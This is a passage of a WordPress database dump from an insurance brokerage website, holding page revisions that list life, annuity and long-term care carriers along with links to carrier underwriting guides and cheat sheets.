<li>National Integrity Life Insurance Company</li>\r\n <li>National Life Group - Life Ins. Co. of the Southwest</li>\r\n <li>Nationwide</li>\r\n <li>New York Life</li>\r\n <li>North American Company for Life and Health Insurance®</li>\r\n <li>Penn Mutual</li>\r\n <li>Principal Life Insurance Company</li>\r\n <li>Protective Life</li>\r\n <li>Reliance Standard Life</li>\r\n <li>Security Mutual Life Insurance Company of New York, Binghamton, NY</li>\r\n <li>Standard Insurance Company</li>\r\n <li>United of Omaha</li>\r\n <li>Voya Insurance and Annuity Company</li>\r\n</ul>\r\n\r\n<hr />\r\n\r\n<h1>Long-Term Care Insurance Carriers</h1>\r\n<ul>\r\n <li>Allianz Life Insurance Company of North America</li>\r\n <li>Athene NY</li>\r\n <li>Genworth Life Insurance Company</li>\r\n <li>Genworth Life Insurance Company of New York</li>\r\n <li>John Hancock</li>\r\n <li>MassMutual</li>\r\n <li>MetLife (All Companies)</li>\r\n <li>Mutual of Omaha</li>\r\n <li>New York Life</li>\r\n <li>Prudential Financial</li>\r\n</ul>\r\n<h3></h3>\r\n</div>','Carriers','','inherit','open','open','','185-revision-v1','','','2015-11-07 15:50:48','2015-11-07 15:50:48','',185,'http://www.empireins.com/185-revision-v1/',0,'revision','',0),(372,1,'2015-11-07 15:50:58','2015-11-07 15:50:58','<div>EIB represents a full suite of carriers across three primary markets: Life Insurance, Annuities and Long-Term Care Insurance. Whether in the specialized market of New York or the balance of the 50 states, we have the carriers and products needed to deliver a superior outcome for your next client\'s insurance needs.</div>\r\n\r\n<hr />\r\n\r\n<h1>Life Insurance Carriers</h1>\r\n<div class=\"about-content\">\r\n<ul>\r\n <li>American General Life Companies</li>\r\n <li>American National (ANICO)\r\nAmeritas Life / Ameritas Life of NY\r\nAthene\r\nAthene NY</li>\r\n <li>AXA\r\nBanner Life\r\nCompanion of New York\r\nFirst MetLife Investors Insurance Company\r\nGenworth Life and Annuity Insurance Company\r\nGenworth Life Insurance Company\r\nGenworth Life Insurance Company of New York</li>\r\n <li>Guardian Life\r\nHartford\r\nJohn Hancock\r\nLincoln National Life Insurance Company</li>\r\n <li>Mass Mutual\r\nMetLife (All Companies)\r\nMinnesota Life</li>\r\n <li>National Life of Vermont\r\nNationwide</li>\r\n <li>Penn Mutual\r\nPrincipal Life Insurance Company\r\nPrincipal National Life Insurance Company</li>\r\n <li>Protective Life\r\nProtective Life and Annuity of NY\r\nPrudential Financial</li>\r\n <li>New York Life\r\nReliastar Life Insurance Company\r\nReliastar Life Insurance Company of New York\r\nSBLI (Savings Bank Life Insurance Co of Mass)\r\nSecurian Life Insurance Company\r\nSecurity Mutual Life Insurance Company of New York, Binghamton, NY</li>\r\n <li>Symetra Financial\r\nTransamerica Financial Life Insurance Co\r\nTransamerica Life Insurance Co.\r\nUnited of Omaha</li>\r\n <li>US Life\r\nVoya Financial\r\nWilliam Penn</li>\r\n</ul>\r\n\r\n<hr />\r\n\r\n<h1>Annuity Carriers</h1>\r\n<ul>\r\n <li>AIG Annuities Fixed & Index</li>\r\n <li>AIG Annuities Fixed & Index of NY</li>\r\n <li>Allianz Life Insurance Company of North America</li>\r\n <li>American General Life Companies - All states except NY (AGL)</li>\r\n <li>American National</li>\r\n <li>Ameritas Life / Ameritas Life of NY</li>\r\n <li>Athene</li>\r\n <li>Athene Annuity & Life Assurance Company</li>\r\n <li>Columbus Life Insurance Company</li>\r\n <li>Companion of New York</li>\r\n <li>EquiTrust Life</li>\r\n <li>Fidelity & Guaranty Life</li>\r\n <li>Fidelity & Guaranty Life of NY</li>\r\n <li>First MetLife Investors Insurance Company</li>\r\n <li>Genworth Life and Annuity Insurance Company</li>\r\n <li>Genworth Life Insurance Company</li>\r\n <li>Genworth Life Insurance Company of New York</li>\r\n <li>Integrity Life Insurance Company</li>\r\n <li>Jackson National Life</li>\r\n <li>Jackson National Life of New York</li>\r\n <li>Lincoln National Life Insurance Company</li>\r\n <li>MetLife (All Companies)</li>\r\n <li>National Integrity Life Insurance Company</li>\r\n <li>National Life Group - Life Ins. Co. of the Southwest</li>\r\n <li>Nationwide</li>\r\n <li>New York Life</li>\r\n <li>North American Company for Life and Health Insurance®</li>\r\n <li>Penn Mutual</li>\r\n <li>Principal Life Insurance Company</li>\r\n <li>Protective Life</li>\r\n <li>Reliance Standard Life</li>\r\n <li>Security Mutual Life Insurance Company of New York, Binghamton, NY</li>\r\n <li>Standard Insurance Company</li>\r\n <li>United of Omaha</li>\r\n <li>Voya Insurance and Annuity Company</li>\r\n</ul>\r\n\r\n<hr />\r\n\r\n<h1>Long-Term Care Insurance Carriers</h1>\r\n<ul>\r\n <li>Allianz Life Insurance Company of North America</li>\r\n <li>Athene NY</li>\r\n <li>Genworth Life Insurance Company</li>\r\n <li>Genworth Life Insurance Company of New York</li>\r\n <li>John Hancock</li>\r\n <li>MassMutual</li>\r\n <li>MetLife (All Companies)</li>\r\n <li>Mutual of Omaha</li>\r\n <li>New York Life</li>\r\n <li>Prudential Financial</li>\r\n</ul>\r\n<h3></h3>\r\n</div>','Carriers','','inherit','open','open','','185-revision-v1','','','2015-11-07 15:50:58','2015-11-07 15:50:58','',185,'http://www.empireins.com/185-revision-v1/',0,'revision','',0),(373,1,'2015-11-07 15:52:56','2015-11-07 15:52:56','[webpipesso f=\"forms\" t=\"iframe\" width=\"100p\" height=\"2000\"]','Forms','','inherit','open','open','','311-autosave-v1','','','2015-11-07 15:52:56','2015-11-07 15:52:56','',311,'http://www.empireins.com/311-autosave-v1/',0,'revision','',0),(374,1,'2015-11-07 16:00:36','2015-11-07 16:00:36','<div>EIB represents a full suite of carriers across three primary markets: Life Insurance, Annuities and Long-Term Care Insurance. Whether in the specialized market of New York or the balance of the 50 states, we have the carriers and products needed to deliver a superior outcome for your next client\'s insurance needs.</div>\r\n\r\n<hr />\r\n\r\n<h1>Life Insurance Carriers</h1>\r\n<a href=\"http://www.empireins.com/life-product-search/\" target=\"_blank\">Follow this link for more information about our Life Insurance Carriers and Products</a>\r\n<div class=\"about-content\">\r\n<ul>\r\n <li>American General Life Companies</li>\r\n <li>American National (ANICO)\r\nAmeritas Life / Ameritas Life of NY\r\nAthene\r\nAthene NY</li>\r\n <li>AXA\r\nBanner Life\r\nCompanion of New York\r\nFirst MetLife Investors Insurance Company\r\nGenworth Life and Annuity Insurance Company\r\nGenworth Life Insurance Company\r\nGenworth Life Insurance Company of New York</li>\r\n <li>Guardian Life\r\nHartford\r\nJohn Hancock\r\nLincoln National Life Insurance Company</li>\r\n <li>Mass Mutual\r\nMetLife (All Companies)\r\nMinnesota Life</li>\r\n <li>National Life of Vermont\r\nNationwide</li>\r\n <li>Penn Mutual\r\nPrincipal Life Insurance Company\r\nPrincipal National Life Insurance Company</li>\r\n <li>Protective Life\r\nProtective Life and Annuity of NY\r\nPrudential Financial</li>\r\n <li>New York Life\r\nReliastar Life Insurance Company\r\nReliastar Life Insurance Company of New York\r\nSBLI (Savings Bank Life Insurance Co of Mass)\r\nSecurian Life Insurance Company\r\nSecurity Mutual Life Insurance Company of New York, Binghamton, NY</li>\r\n <li>Symetra Financial\r\nTransamerica Financial Life Insurance Co\r\nTransamerica Life Insurance Co.\r\nUnited of Omaha</li>\r\n <li>US Life\r\nVoya Financial\r\nWilliam Penn</li>\r\n</ul>\r\n\r\n<hr />\r\n\r\n<h1>Annuity Carriers</h1>\r\n<a href=\"http://www.empireins.com/annuity-product-search/\" target=\"_blank\">Follow this link for more information about our Annuity Carriers and Products</a>\r\n<ul>\r\n <li>AIG Annuities Fixed & Index</li>\r\n <li>AIG Annuities Fixed & Index of NY</li>\r\n <li>Allianz Life Insurance Company of North America</li>\r\n <li>American General Life Companies - All states except NY (AGL)</li>\r\n <li>American National</li>\r\n <li>Ameritas Life / Ameritas Life of NY</li>\r\n <li>Athene</li>\r\n <li>Athene Annuity & Life Assurance Company</li>\r\n <li>Columbus Life Insurance Company</li>\r\n <li>Companion of New York</li>\r\n <li>EquiTrust Life</li>\r\n <li>Fidelity & Guaranty Life</li>\r\n <li>Fidelity & Guaranty Life of NY</li>\r\n <li>First MetLife Investors Insurance Company</li>\r\n <li>Genworth Life and Annuity Insurance Company</li>\r\n <li>Genworth Life Insurance Company</li>\r\n <li>Genworth Life Insurance Company of New York</li>\r\n <li>Integrity Life Insurance Company</li>\r\n <li>Jackson National Life</li>\r\n <li>Jackson National Life of New York</li>\r\n <li>Lincoln National Life Insurance Company</li>\r\n <li>MetLife (All Companies)</li>\r\n <li>National Integrity Life Insurance Company</li>\r\n <li>National Life Group - Life Ins. Co. of the Southwest</li>\r\n <li>Nationwide</li>\r\n <li>New York Life</li>\r\n <li>North American Company for Life and Health Insurance®</li>\r\n <li>Penn Mutual</li>\r\n <li>Principal Life Insurance Company</li>\r\n <li>Protective Life</li>\r\n <li>Reliance Standard Life</li>\r\n <li>Security Mutual Life Insurance Company of New York, Binghamton, NY</li>\r\n <li>Standard Insurance Company</li>\r\n <li>United of Omaha</li>\r\n <li>Voya Insurance and Annuity Company</li>\r\n</ul>\r\n\r\n<hr />\r\n\r\n<h1>Long-Term Care Insurance Carriers</h1>\r\n<ul>\r\n <li>Allianz Life Insurance Company of North America</li>\r\n <li>Athene NY</li>\r\n <li>Genworth Life Insurance Company</li>\r\n <li>Genworth Life Insurance Company of New York</li>\r\n <li>John Hancock</li>\r\n <li>MassMutual</li>\r\n <li>MetLife (All Companies)</li>\r\n <li>Mutual of Omaha</li>\r\n <li>New York Life</li>\r\n <li>Prudential Financial</li>\r\n</ul>\r\n<h3></h3>\r\n</div>','Carriers','','inherit','open','open','','185-revision-v1','','','2015-11-07 16:00:36','2015-11-07 16:00:36','',185,'http://www.empireins.com/185-revision-v1/',0,'revision','',0),(375,1,'2015-11-07 16:12:12','2015-11-07 16:12:12','Where is that text coming from?\r\n\r\n[sso-broker-gear]','Case Status','','inherit','open','open','','303-autosave-v1','','','2015-11-07 16:12:12','2015-11-07 16:12:12','',303,'http://www.empireins.com/303-autosave-v1/',0,'revision','',0),(379,1,'2015-11-14 14:51:03','2015-11-14 14:51:03','<p style=\"text-align: justify;\"><strong>In some cases, there is a clear-cut answer to an underwriting question, and you can find most of those answers in the Core Carrier Field Underwriting Guides listed below. Not sure that the answer to your questions is definitive? Give the EIB Team a call.</strong></p>\r\n\r\n\r\n<hr />\r\n\r\n<h4 style=\"text-align: justify;\">Core Carrier Field Underwriting Guides</h4>\r\n<ul>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/ACC-Field-Underwriting-Guide.pdf\" target=\"_blank\">Accordia Life</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/AIG-UW-Guide-06-08-2015.pdf\" target=\"_blank\">AIG</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/AXA-Field-Underwriting-Guide.pdf\" target=\"_blank\">AXA</a></li>\r\n <li><a title=\"LG-Field-Underwriting-Guide\" href=\"http://www.empireins.com/wp-content/uploads/2014/04/LG-Field-Underwriting-Guide.pdf\" target=\"_blank\">Banner Life / William Penn</a></li>\r\n <li><a title=\"Guardian UW Guide\" href=\"http://www.empireins.com/wp-content/uploads/2014/04/Guardian-UW-Guide.pdf\" target=\"_blank\">Guardian</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/JH-Field-Underwriting-Guide.pdf\" target=\"_blank\">John Hancock</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/LFD-Field-Underwriting-Guide.pdf\" target=\"_blank\">Lincoln Financial</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/MoneyGuard-UW-Resources.pdf\" target=\"_blank\">Lincoln MoneyGuard</a></li>\r\n <li><a title=\"MM-Field-Underwriting-Guide.pdf\" href=\"http://www.empireins.com/wp-content/uploads/2014/04/MM-Field-Underwriting-Guide.pdf\" target=\"_blank\">Mass Mutual</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/BDUW24751_Life_UW_Guide-FINAL_April-2015.pdf\" target=\"_blank\">MetLife</a></li>\r\n <li><a title=\"MN-Life-2015-Underwriting-Packet\" href=\"http://www.empireins.com/wp-content/uploads/2014/04/MN-Life-2015-Underwriting-Packet-.pdf\" target=\"_blank\">Minnesota Life / Securian</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/MOO-Life-Underwriting-Guide-July-2015.pdf\" target=\"_blank\">Mutual of Omaha</a></li>\r\n <li><a title=\"NYL-Field-Underwriting-Guide\" href=\"http://www.empireins.com/wp-content/uploads/2014/04/NYL-Field-Underwriting-Guide.pdf\" target=\"_blank\">New York Life</a></li>\r\n <li><a title=\"PM-Field-Underwriting-Guide\" href=\"http://www.empireins.com/wp-content/uploads/2014/04/PM-Field-Underwriting-Guide.pdf\" target=\"_blank\">Penn Mutual</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/PRN-Field-Underwriting-Guide.pdf\" target=\"_blank\">Principal Financial</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/PRO-Field-Underwriting-Guide.pdf\" target=\"_blank\">Protective Life</a></li>\r\n <li><a title=\"Pru-Field-Underwriting-Guide\" href=\"http://www.empireins.com/wp-content/uploads/2014/04/Pru-Field-Underwriting-Guide.pdf\" target=\"_blank\">Prudential Financial</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/Sym-Field-Underwriting-Guide.pdf\" target=\"_blank\">Symetra Financial</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/TA-Field-Underwriting-Guide.pdf\" target=\"_blank\">Transamerica</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/VYA-Field-Underwriting-Guide.pdf\" target=\"_blank\">Voya Financial</a></li>\r\n</ul>\r\n<p style=\"text-align: justify;\">What’s included in these Field Underwriting Guides? All of the publicly available information regarding Age and Amount Requirements, Approved Vendors, Preferred Guidelines, Build Charts, and insight into how the Core Carrier views certain medical conditions.</p>','Carrier Field Underwriting Guides','','publish','open','open','','carrier-field-underwriting-guides','','','2015-12-11 16:37:34','2015-12-11 16:37:34','',0,'http://www.empireins.com/?page_id=379',0,'page','',0),(380,1,'2015-11-14 14:50:15','2015-11-14 14:50:15','In some cases, there is a clear-cut answer to an underwriting question, and you can find most of those answers in the Core Carrier Field Underwriting Guides listed below. Not sure that the answer to your questions is definitive? Give the EIB Team a call.\r\n\r\n<hr />\r\n\r\nCore Carrier Field Underwriting Guides\r\n<ul>\r\n <li>Accordia Life</li>\r\n <li>AIG</li>\r\n <li>AXA</li>\r\n <li>John Hancock</li>\r\n <li>Lincoln Financial</li>\r\n <li>Lincoln MoneyGuard</li>\r\n <li>MetLife</li>\r\n <li>Mutual of Omaha</li>\r\n <li>Principal Financial</li>\r\n <li>Protective Life</li>\r\n <li>Symetra Financial</li>\r\n <li>Transamerica</li>\r\n <li>Voya Financial</li>\r\n</ul>\r\nWhat’s included in these Field Underwriting Guides? All of the publicly available information regarding Age and Amount Requirements, Approved Vendors, Preferred Guidelines, Build Charts, and insight into how the Core Carrier views certain medical conditions.','Carrier Field Underwriting Guides','','inherit','open','open','','379-revision-v1','','','2015-11-14 14:50:15','2015-11-14 14:50:15','',379,'http://www.empireins.com/379-revision-v1/',0,'revision','',0),(381,1,'2015-11-14 14:50:42','2015-11-14 14:50:42','<strong>In some cases, there is a clear-cut answer to an underwriting question, and you can find most of those answers in the Core Carrier Field Underwriting Guides listed below. Not sure that the answer to your questions is definitive? Give the EIB Team a call.</strong>\r\n\r\n<hr />\r\n\r\n<h4>Core Carrier Field Underwriting Guides</h4>\r\n<ul>\r\n <li>Accordia Life</li>\r\n <li>AIG</li>\r\n <li>AXA</li>\r\n <li>John Hancock</li>\r\n <li>Lincoln Financial</li>\r\n <li>Lincoln MoneyGuard</li>\r\n <li>MetLife</li>\r\n <li>Mutual of Omaha</li>\r\n <li>Principal Financial</li>\r\n <li>Protective Life</li>\r\n <li>Symetra Financial</li>\r\n <li>Transamerica</li>\r\n <li>Voya Financial</li>\r\n</ul>\r\nWhat’s included in these Field Underwriting Guides? All of the publicly available information regarding Age and Amount Requirements, Approved Vendors, Preferred Guidelines, Build Charts, and insight into how the Core Carrier views certain medical conditions.','Carrier Field Underwriting Guides','','inherit','open','open','','379-revision-v1','','','2015-11-14 14:50:42','2015-11-14 14:50:42','',379,'http://www.empireins.com/379-revision-v1/',0,'revision','',0),(382,1,'2015-11-14 14:51:03','2015-11-14 14:51:03','<p style=\"text-align: justify;\"><strong>In some cases, there is a clear-cut answer to an underwriting question, and you can find most of those answers in the Core Carrier Field Underwriting Guides listed below. Not sure that the answer to your questions is definitive? Give the EIB Team a call.</strong></p>\r\n\r\n\r\n<hr />\r\n\r\n<h4 style=\"text-align: justify;\">Core Carrier Field Underwriting Guides</h4>\r\n<ul style=\"text-align: justify;\">\r\n <li>Accordia Life</li>\r\n <li>AIG</li>\r\n <li>AXA</li>\r\n <li>John Hancock</li>\r\n <li>Lincoln Financial</li>\r\n <li>Lincoln MoneyGuard</li>\r\n <li>MetLife</li>\r\n <li>Mutual of Omaha</li>\r\n <li>Principal Financial</li>\r\n <li>Protective Life</li>\r\n <li>Symetra Financial</li>\r\n <li>Transamerica</li>\r\n <li>Voya Financial</li>\r\n</ul>\r\n<p style=\"text-align: justify;\">\r\nWhat’s included in these Field Underwriting Guides? All of the publicly available information regarding Age and Amount Requirements, Approved Vendors, Preferred Guidelines, Build Charts, and insight into how the Core Carrier views certain medical conditions.</p>','Carrier Field Underwriting Guides','','inherit','open','open','','379-revision-v1','','','2015-11-14 14:51:03','2015-11-14 14:51:03','',379,'http://www.empireins.com/379-revision-v1/',0,'revision','',0),(383,1,'2015-11-14 14:55:54','2015-11-14 14:55:54','<p style=\"text-align: justify;\"><strong>Need a quick answer to how a wide cross section of insurance companies view a specific aspect of a client’s medical, personal or lifestyle history? This collection of Underwriting Cheat Sheets contain clear answers to straightforward questions that we all face on a day in, day out basis. Of course, when you have a unique situation that is not covered by these Cheat Sheets, the EIB Team is ready to step in and provide some insight on the more nuanced situation. Reach out to them by phone, or via email.</strong></p>\r\n\r\n\r\n<hr />\r\n\r\n<h4 style=\"text-align: justify;\">Carrier Underwriting Cheat Sheets</h4>\r\n<ul>\r\n <li style=\"text-align: justify;\"><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/Aviation-Cheat-Sheet.pdf\" target=\"_blank\">Aviation Guidelines</a></li>\r\n <li style=\"text-align: justify;\"><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/Avocation-Exclusion-Cheat-Sheet.pdf\" target=\"_blank\">Avocation Guidelines</a></li>\r\n <li style=\"text-align: justify;\"><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/Bankruptcy-History-Cheat-Sheet.pdf\" target=\"_blank\">Bankruptcy Guidelines</a></li>\r\n <li style=\"text-align: justify;\"><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/Blood-Pressure-Cheat-Sheet.pdf\" target=\"_blank\">Blood Pressure Guidelines</a></li>\r\n <li style=\"text-align: justify;\"><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/Cancer-History-Cheat-Sheet.pdf\" target=\"_blank\">Cancer Personal History Guidelines</a></li>\r\n <li style=\"text-align: justify;\"><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/Cholesterol-Cheat-Sheet.pdf\" target=\"_blank\">Cholesterol Guidelines</a></li>\r\n <li style=\"text-align: justify;\"><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/Driving-History-Cheat-Sheet.pdf\" target=\"_blank\">Driving History Guidelines</a></li>\r\n <li style=\"text-align: justify;\"><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/Family-History-Cheat-Sheet.pdf\" target=\"_blank\">Family History Guidelines</a></li>\r\n <li style=\"text-align: justify;\"><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/Marijuana-Usage-Cheat-Sheet.pdf\" target=\"_blank\">Marijuana Usage Guidelines</a></li>\r\n <li style=\"text-align: justify;\"><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/Tobacco-Usage-Cheat-Sheet.pdf\" target=\"_blank\">Tobacco Usage Guidelines</a></li>\r\n <li style=\"text-align: justify;\"><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/Underwriting-Programs-Cheat-Sheet.pdf\" target=\"_blank\">Underwriting Programs Summary</a> (Table Shaves, Lifestyle credits, etc.)</li>\r\n</ul>','Underwriting Cheat Sheets','','publish','open','open','','underwriting-cheat-sheets','','','2015-11-14 15:24:24','2015-11-14 15:24:24','',0,'http://www.empireins.com/?page_id=383',0,'page','',0),(384,1,'2015-11-14 14:54:16','2015-11-14 14:54:16','<p style=\"text-align: justify;\"><strong>Need a quick answer to how a wide cross section of insurance companies view a specific aspect of a client’s medical, personal or lifestyle history? This collection of Underwriting Cheat Sheets contain clear answers to straightforward questions that we all face on a day in, day out basis. Of course, when you have a unique situation that is not covered by these Cheat Sheets, the EIB Team is ready to step in and provide some insight on the more nuanced situation. Reach out to them by phone, or via email.</strong></p>\r\n\r\n\r\n<hr />\r\n\r\n<h4 style=\"text-align: justify;\">Carrier Underwriting Cheat Sheets</h4>\r\n<ul>\r\n <li style=\"text-align: justify;\">Aviation Guidelines</li>\r\n <li style=\"text-align: justify;\">Avocation Exclusion Guidelines</li>\r\n <li style=\"text-align: justify;\">Bankruptcy Guidelines</li>\r\n <li style=\"text-align: justify;\">Blood Pressure Guidelines</li>\r\n <li style=\"text-align: justify;\">Cancer Personal History Guidelines</li>\r\n <li style=\"text-align: justify;\">Cholesterol Guidelines</li>\r\n <li style=\"text-align: justify;\">Driving History Guidelines</li>\r\n <li style=\"text-align: justify;\">Family History Guidelines</li>\r\n <li style=\"text-align: justify;\">Marijuana Usage Guidelines</li>\r\n <li style=\"text-align: justify;\">Tobacco Usage Guidelines</li>\r\n <li style=\"text-align: justify;\">Underwriting Programs Summary (Table Shaves, Lifestyle credits, etc.)</li>\r\n</ul>','Underwriting Cheat Sheets','','inherit','open','open','','383-revision-v1','','','2015-11-14 14:54:16','2015-11-14 14:54:16','',383,'http://www.empireins.com/383-revision-v1/',0,'revision','',0),(385,1,'2015-11-14 14:54:56','2015-11-14 14:54:56','<strong>Need a quick answer to how a wide cross section of insurance companies view a specific aspect of a client’s medical, personal or lifestyle history? This collection of Underwriting Cheat Sheets contain clear answers to straightforward questions that we all face on a day in, day out basis. Of course, when you have a unique situation that is not covered by these Cheat Sheets, the EIB Team is ready to step in and provide some insight on the more nuanced situation. Reach out to them by phone, or via email.</strong>\r\n\r\n<hr />\r\n\r\n<h4>Carrier Underwriting Cheat Sheets</h4>\r\n<ul>\r\n <li>Aviation Guidelines</li>\r\n <li>Avocation Exclusion Guidelines</li>\r\n <li>Bankruptcy Guidelines</li>\r\n <li>Blood Pressure Guidelines</li>\r\n <li>Cancer Personal History Guidelines</li>\r\n <li>Cholesterol Guidelines</li>\r\n <li>Driving History Guidelines</li>\r\n <li>Family History Guidelines</li>\r\n <li>Marijuana Usage Guidelines</li>\r\n <li>Tobacco Usage Guidelines</li>\r\n <li style=\"text-align: justify;\">Underwriting Programs Summary (Table Shaves, Lifestyle credits, etc.)</li>\r\n</ul>','Underwriting Cheat Sheets','','inherit','open','open','','383-revision-v1','','','2015-11-14 14:54:56','2015-11-14 14:54:56','',383,'http://www.empireins.com/383-revision-v1/',0,'revision','',0),(386,1,'2015-11-14 14:55:21','2015-11-14 14:55:21','<p style=\"text-align: justify;\"><strong>In some cases, there is a clear-cut answer to an underwriting question, and you can find most of those answers in the Core Carrier Field Underwriting Guides listed below. Not sure that the answer to your questions is definitive? Give the EIB Team a call.</strong></p>\r\n\r\n\r\n<hr />\r\n\r\n<h4 style=\"text-align: justify;\">Core Carrier Field Underwriting Guides</h4>\r\n<ul style=\"text-align: justify;\">\r\n <li>Accordia Life</li>\r\n <li>AIG</li>\r\n <li>AXA</li>\r\n <li>John Hancock</li>\r\n <li>Lincoln Financial</li>\r\n <li>Lincoln MoneyGuard</li>\r\n <li>MetLife</li>\r\n <li>Mutual of Omaha</li>\r\n <li>Principal Financial</li>\r\n <li>Protective Life</li>\r\n <li>Symetra Financial</li>\r\n <li>Transamerica</li>\r\n <li>Voya Financial</li>\r\n</ul>\r\n<p style=\"text-align: justify;\">What’s included in these Field Underwriting Guides? All of the publicly available information regarding Age and Amount Requirements, Approved Vendors, Preferred Guidelines, Build Charts, and insight into how the Core Carrier views certain medical conditions.</p>','Carrier Field Underwriting Guides','','inherit','open','open','','379-revision-v1','','','2015-11-14 14:55:21','2015-11-14 14:55:21','',379,'http://www.empireins.com/379-revision-v1/',0,'revision','',0),(387,1,'2015-12-11 16:28:50','2015-12-11 16:28:50','<p style=\"text-align: justify;\"><strong>In some cases, there is a clear-cut answer to an underwriting question, and you can find most of those answers in the Core Carrier Field Underwriting Guides listed below. Not sure that the answer to your questions is definitive? Give the EIB Team a call.</strong></p>\n\n\n<hr />\n\n<h4 style=\"text-align: justify;\">Core Carrier Field Underwriting Guides</h4>\n<ul>\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/ACC-Field-Underwriting-Guide.pdf\" target=\"_blank\">Accordia Life</a></li>\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/AIG-UW-Guide-06-08-2015.pdf\" target=\"_blank\">AIG</a></li>\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/AXA-Field-Underwriting-Guide.pdf\" target=\"_blank\">AXA</a></li>\n <li><a title=\"LG-Field-Underwriting-Guide\" href=\"http://www.empireins.com/wp-content/uploads/2014/04/LG-Field-Underwriting-Guide.pdf\" target=\"_blank\">Banner Life / William Penn</a></li>\n <li><a title=\"Guardian UW Guide\" href=\"http://www.empireins.com/wp-content/uploads/2014/04/Guardian-UW-Guide.pdf\" target=\"_blank\">Guardian</a></li>\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/JH-Field-Underwriting-Guide.pdf\" target=\"_blank\">John Hancock</a></li>\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/LFD-Field-Underwriting-Guide.pdf\" target=\"_blank\">Lincoln Financial</a></li>\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/MoneyGuard-UW-Resources.pdf\" target=\"_blank\">Lincoln MoneyGuard</a></li>\n <li><a title=\"MM-Field-Underwriting-Guide.pdf\" href=\"http://www.empireins.com/wp-content/uploads/2014/04/MM-Field-Underwriting-Guide.pdf\" target=\"_blank\">Mass Mutual</a></li>\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/BDUW24751_Life_UW_Guide-FINAL_April-2015.pdf\" target=\"_blank\">MetLife</a></li>\n <li><a title=\"MN-Life-2015-Underwriting-Packet\" href=\"http://www.empireins.com/wp-content/uploads/2014/04/MN-Life-2015-Underwriting-Packet-.pdf\" target=\"_blank\">Minnesota Life / Securian </a></li>\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/MOO-Life-Underwriting-Guide-July-2015.pdf\" target=\"_blank\">Mutual of Omaha</a></li>\n <li><a title=\"NYL-Field-Underwriting-Guide\" href=\"http://www.empireins.com/wp-content/uploads/2014/04/NYL-Field-Underwriting-Guide.pdf\" target=\"_blank\">New York Life</a></li>\n <li><a title=\"PM-Field-Underwriting-Guide\" href=\"http://www.empireins.com/wp-content/uploads/2014/04/PM-Field-Underwriting-Guide.pdf\" target=\"_blank\">Penn Mutual</a></li>\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/PRN-Field-Underwriting-Guide.pdf\" target=\"_blank\">Principal Financial</a></li>\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/PRO-Field-Underwriting-Guide.pdf\" target=\"_blank\">Protective Life</a></li>\n <li><a title=\"Pru-Field-Underwriting-Guide\" href=\"http://www.empireins.com/wp-content/uploads/2014/04/Pru-Field-Underwriting-Guide.pdf\" target=\"_blank\">Prudential Financial</a></li>\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/Sym-Field-Underwriting-Guide.pdf\" target=\"_blank\">Symetra Financial</a></li>\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/TA-Field-Underwriting-Guide.pdf\" target=\"_blank\">Transamerica</a></li>\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/VYA-Field-Underwriting-Guide.pdf\" target=\"_blank\">Voya Financial</a></li>\n</ul>\n<p style=\"text-align: justify;\">What’s included in these Field Underwriting Guides? All of the publicly available information regarding Age and Amount Requirements, Approved Vendors, Preferred Guidelines, Build Charts, and insight into how the Core Carrier views certain medical conditions.</p>','Carrier Field Underwriting Guides','','inherit','open','open','','379-autosave-v1','','','2015-12-11 16:28:50','2015-12-11 16:28:50','',379,'http://www.empireins.com/379-autosave-v1/',0,'revision','',0),(388,1,'2015-11-14 15:00:03','2015-11-14 15:00:03','<p style=\"text-align: justify;\"><strong>Need a quick answer to how a wide cross section of insurance companies view a specific aspect of a client’s medical, personal or lifestyle history? This collection of Underwriting Cheat Sheets contain clear answers to straightforward questions that we all face on a day in, day out basis. Of course, when you have a unique situation that is not covered by these Cheat Sheets, the EIB Team is ready to step in and provide some insight on the more nuanced situation. Reach out to them by phone, or via email.</strong></p>\r\n\r\n\r\n<hr />\r\n\r\n<h4 style=\"text-align: justify;\">Carrier Underwriting Cheat Sheets</h4>\r\n<ul>\r\n <li style=\"text-align: justify;\">Aviation Guidelines</li>\r\n <li style=\"text-align: justify;\">Avocation Exclusion Guidelines</li>\r\n <li style=\"text-align: justify;\">Bankruptcy Guidelines</li>\r\n <li style=\"text-align: justify;\">Blood Pressure Guidelines</li>\r\n <li 